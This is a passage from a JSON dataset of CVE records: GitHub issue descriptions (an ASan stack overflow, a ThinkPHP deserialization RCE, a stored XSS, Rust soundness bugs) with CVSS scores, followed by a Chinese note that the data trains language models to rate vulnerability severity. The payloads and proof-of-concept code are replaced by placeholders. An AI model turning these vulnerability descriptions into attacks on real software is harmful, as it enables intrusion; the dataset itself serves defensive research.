  91346. "description": "A stackoverflow bug. Hi, there is a stack overflow bug in APITAG which is found by fuzzing. It can be reproduced by the FILETAG attached (by using APITAG script and FILETAG is assumed to be unziped). FILETAG Here is the message output by APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fffa NUMBERTAG f NUMBERTAG at pc NUMBERTAG e bp NUMBERTAG fffa NUMBERTAG e NUMBERTAG sp NUMBERTAG fffa NUMBERTAG e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG fffa NUMBERTAG f NUMBERTAG thread T NUMBERTAG d ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG e8ab ( PATHTAG NUMBERTAG da0c ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG d6b0 ( PATHTAG NUMBERTAG c5d7 ( PATHTAG NUMBERTAG eb ( PATHTAG NUMBERTAG b ( PATHTAG NUMBERTAG e NUMBERTAG e ( PATHTAG NUMBERTAG e0ed ( PATHTAG NUMBERTAG f NUMBERTAG e0b2 ( PATHTAG NUMBERTAG d ( PATHTAG ) Address NUMBERTAG fffa NUMBERTAG f NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG fcf ( PATHTAG ) This frame has NUMBERTAG object(s NUMBERTAG remaining_bytes NUMBERTAG incoming_message' APITAG NUMBERTAG beb NUMBERTAG f2]f2 f2 f2 f2 f2 f2 f NUMBERTAG f2 f2 f NUMBERTAG bec0: f2 f NUMBERTAG f NUMBERTAG f2 f2 f NUMBERTAG bed NUMBERTAG bee NUMBERTAG bef NUMBERTAG bf NUMBERTAG f3 f3 f3 f3 f3 f3 Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  91347. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  91348. "severity": "HIGH",
  91349. "baseScore": 7.8,
  91350. "impactScore": 5.9,
  91351. "exploitabilityScore": 1.8
  91352. },
  91353. {
  91354. "CVE_ID": "CVE-2022-33070",
  91355. "Issue_Url_old": "https://github.com/protobuf-c/protobuf-c/issues/506",
  91356. "Issue_Url_new": "https://github.com/protobuf-c/protobuf-c/issues/506",
  91357. "Repo_new": "protobuf-c/protobuf-c",
  91358. "Issue_Created_At": "2022-04-29T15:41:58Z",
  91359. "description": "APITAG invalid left shift in protobuf c.c NUMBERTAG Describe the bug APITAG invalid left shift in protobuf c.c NUMBERTAG To Reproduce Built protobuf c using clang NUMBERTAG according to FILETAG with ERRORTAG commit: APITAG UBSAN Output ERRORTAG testcases that trigger the issue: FILETAG",
  91360. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91361. "severity": "MEDIUM",
  91362. "baseScore": 5.5,
  91363. "impactScore": 3.6,
  91364. "exploitabilityScore": 1.8
  91365. },
  91366. {
  91367. "CVE_ID": "CVE-2022-33107",
  91368. "Issue_Url_old": "https://github.com/top-think/framework/issues/2717",
  91369. "Issue_Url_new": "https://github.com/top-think/framework/issues/2717",
  91370. "Repo_new": "top-think/framework",
  91371. "Issue_Created_At": "2022-05-24T07:16:25Z",
  91372. "description": "APITAG NUMBERTAG Unserialize RCE. APITAG RCE\u94fe\u5b50 Environment installation test APITAG Environment APITAG composer create project APITAG tp NUMBERTAG Add deserialization entry point ERRORTAG APITAG CODETAG access APITAG successfully RCE FILETAG exp ERRORTAG",
  91373. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  91374. "severity": "CRITICAL",
  91375. "baseScore": 9.8,
  91376. "impactScore": 5.9,
  91377. "exploitabilityScore": 3.9
  91378. },
  91379. {
  91380. "CVE_ID": "CVE-2022-33113",
  91381. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/39",
  91382. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/39",
  91383. "Repo_new": "jflyfox/jfinal_cms",
  91384. "Issue_Created_At": "2022-06-10T14:54:45Z",
  91385. "description": "XSS vulnerability stored in the publish blog module of Jfinal_cms NUMBERTAG There is a stored XSS vulnerability in APITAG 's publish blog module. An attacker can insert malicious XSS code into the keyword field. When the user views the content of the article in the foreground, the malicious XSS code is triggered successfully. payload: APITAG APITAG Successfully executed malicious XSS code: APITAG",
  91386. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  91387. "severity": "MEDIUM",
  91388. "baseScore": 5.4,
  91389. "impactScore": 2.7,
  91390. "exploitabilityScore": 2.3
  91391. },
  91392. {
  91393. "CVE_ID": "CVE-2021-38192",
  91394. "Issue_Url_old": "https://github.com/tokio-rs/prost/issues/438",
  91395. "Issue_Url_new": "https://github.com/tokio-rs/prost/issues/438",
  91396. "Repo_new": "tokio-rs/prost",
  91397. "Issue_Created_At": "2021-02-13T20:37:52Z",
  91398. "description": "Conversion from APITAG to APITAG may panic. In prost types NUMBERTAG the conversion from Timestamp to APITAG uses the APITAG and APITAG operators on APITAG . This can overflow and panic URLTAG , creating a denial of service vulnerability if the input Timestamp is untrusted. Also, the conversion involves calling APITAG , which uses the APITAG and APITAG operators. This may panic or wrap around (depending on compiler settings), also creating a denial of service vulnerability if the application is compiled to panic on overflow. Proof of concept ERRORTAG Fixing APITAG should probably use APITAG . This can silently change the timestamp by up to about NUMBERTAG seconds if its nanos field is out of range, but such a timestamp is arguably invalid anyway, so that's probably okay. APITAG does not have APITAG methods, nor MIN and MAX constants. Therefore, unlike APITAG , there is no way to silently clamp the input timestamp to the valid range of APITAG s. That's probably a bad idea anyway, since APITAG could be based on a NUMBERTAG bit APITAG or Windows FILETIME , in which case clamping it could change the timestamp by much more than a mere few seconds. I recommend making the conversion fallible again and using APITAG .",
  91399. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  91400. "severity": "HIGH",
  91401. "baseScore": 7.5,
  91402. "impactScore": 3.6,
  91403. "exploitabilityScore": 3.9
  91404. },
  91405. {
  91406. "CVE_ID": "CVE-2021-38190",
  91407. "Issue_Url_old": "https://github.com/dimforge/nalgebra/issues/883",
  91408. "Issue_Url_new": "https://github.com/dimforge/nalgebra/issues/883",
  91409. "Repo_new": "dimforge/nalgebra",
  91410. "Issue_Created_At": "2021-04-29T15:00:09Z",
  91411. "description": "Deserialize is not sound for APITAG (and possibly others). APITAG currently looks like this: CODETAG APITAG carries an implicit invariant in that APITAG , and I believe there is some unsafe code that relies on this invariant. However, since Deserialize is derived, it does not know about this invariant. Therefore it is possible to break this invariant in safe code by deserializing invalid data. This is a potential security issue, since a malicious attacker might potentially use this to read/write to invalid memory locations. In order to fix this, we should write a custom Deserialize implementation that validates the input. There may also be other soundness issues caused by invariants not being upheld by derived Deserialize implementations throughout the library.",
  91412. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  91413. "severity": "CRITICAL",
  91414. "baseScore": 9.8,
  91415. "impactScore": 5.9,
  91416. "exploitabilityScore": 3.9
  91417. },
  91418. {
  91419. "CVE_ID": "CVE-2020-36203",
  91420. "Issue_Url_old": "https://github.com/diwic/reffers-rs/issues/7",
  91421. "Issue_Url_new": "https://github.com/diwic/reffers-rs/issues/7",
  91422. "Repo_new": "diwic/reffers-rs",
  91423. "Issue_Created_At": "2020-12-01T14:43:57Z",
  91424. "description": "Unsound: can make APITAG contain a APITAG APITAG object.. Hello \ud83e\udd80 , while scanning crates.io, we APITAG group APITAG gatech) have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior. Issue It is possible to make APITAG contain a non Send / non Sync object, since there is no APITAG bound on V in the APITAG function. APITAG Proof of Concept I wrote a short program that can trigger undefined behavior in safe Rust using this crate. Test environment OS: Windows crate version : APITAG compiled with APITAG program exhibits a segmentation fault when compiled and run in release mode. Error message from the program ERRORTAG ERRORTAG Thank you for checking out this issue \ud83e\udd80",
  91425. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  91426. "severity": "MEDIUM",
  91427. "baseScore": 4.7,
  91428. "impactScore": 3.6,
  91429. "exploitabilityScore": 1.0
  91430. },
  91431. {
  91432. "CVE_ID": "CVE-2020-36220",
  91433. "Issue_Url_old": "https://github.com/video-audio/va-ts/issues/4",
  91434. "Issue_Url_new": "https://github.com/video-audio/va-ts/issues/4",
  91435. "Repo_new": "video-audio/va-ts",
  91436. "Issue_Created_At": "2020-12-23T04:43:41Z",
  91437. "description": "Demuxer can carry non Send types across thread boundaries. Hello :crab: , we APITAG group APITAG gatech) found an undefined behavior issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Send is unconditionally implemented for Demuxer , so that it is possible for a non Send implementor of APITAG trait to be sent across thread boundaries. ERRORTAG Proof of Concept Here is a simple program where Demuxer is used to move a APITAG ( APITAG object) to another thread. It is also possible to create data races by inserting non Send types like Rc or Cell into Demuxer (which is not demonstrated in the example code below). ERRORTAG Suggested Fix Adding a trait bound APITAG as below will allow the compiler to prevent Demuxer from moving APITAG types across thread boundaries. ERRORTAG Thank you for reviewing this issue NUMBERTAG",
  91438. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  91439. "severity": "MEDIUM",
  91440. "baseScore": 5.9,
  91441. "impactScore": 3.6,
  91442. "exploitabilityScore": 2.2
  91443. },
  91444. {
  91445. "CVE_ID": "CVE-2020-35897",
  91446. "Issue_Url_old": "https://github.com/slide-rs/atom/issues/13",
  91447. "Issue_Url_new": "https://github.com/slide-rs/atom/issues/13",
  91448. "Repo_new": "slide-rs/atom",
  91449. "Issue_Created_At": "2020-09-21T18:15:03Z",
  91450. "description": "Create new cargo release to address safety issue. I noticed there's been a bunch of changes on master contributed by MENTIONTAG that haven't made their way out onto the cargo crate. Most importantly, the latest release NUMBERTAG is missing URLTAG which fixes a fairly important soundness issue around the Send trait's bounds. Without this commit, it's possible to Send across unsafe objects like Rc and potentially run into data races like so: ERRORTAG This could lead to use after frees and is a fairly easy mistake to make.",
  91451. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  91452. "severity": "MEDIUM",
  91453. "baseScore": 4.7,
  91454. "impactScore": 3.6,
  91455. "exploitabilityScore": 1.0
  91456. },
  91457. {
  91458. "CVE_ID": "CVE-2019-16140",
  91459. "Issue_Url_old": "https://github.com/sagebind/isahc/issues/2",
  91460. "Issue_Url_new": "https://github.com/sagebind/isahc/issues/2",
  91461. "Repo_new": "sagebind/isahc",
  91462. "Issue_Created_At": "2018-01-01T21:19:23Z",
  91463. "description": "impl APITAG for Vec APITAG is unsound. The returned vector is backed by freed memory, because slice is dropped at the end of the function.",
  91464. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  91465. "severity": "CRITICAL",
  91466. "baseScore": 9.8,
  91467. "impactScore": 5.9,
  91468. "exploitabilityScore": 3.9
  91469. },
  91470. {
  91471. "CVE_ID": "CVE-2022-25852",
  91472. "Issue_Url_old": "https://github.com/brianc/node-libpq/issues/84",
  91473. "Issue_Url_new": "https://github.com/brianc/node-libpq/issues/84",
  91474. "Repo_new": "brianc/node-libpq",
  91475. "Issue_Created_At": "2022-06-22T17:19:09Z",
  91476. "description": "Mitigation for CVETAG . Hi there. It appears a vulnerability has been flagged for libpq: URLTAG I'm not sure what the fix is, but I wanted to get this filed, as I haven't found any issue mentioning it yet.",
  91477. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  91478. "severity": "HIGH",
  91479. "baseScore": 7.5,
  91480. "impactScore": 3.6,
  91481. "exploitabilityScore": 3.9
  91482. }
  91483. ]

在信息安全领域，漏洞评估与管理是关键任务之一。本作品探讨了如何利用预训练文本大模型来评估和研判漏洞的严重等级，具体基于通用漏洞评分系统（CVSS）。传统漏洞评分方法依赖于手动分析和专家评审；而基于自然语言处理的文本大模型凭借其深度学习能力，可以自动化地处理和分析大量安全相关文本数据，从而提高漏洞评估的效率和准确性。结合词干提取、词形还原等预处理，能够更好地发挥自然语言处理文本大模型的预测能力与准确度。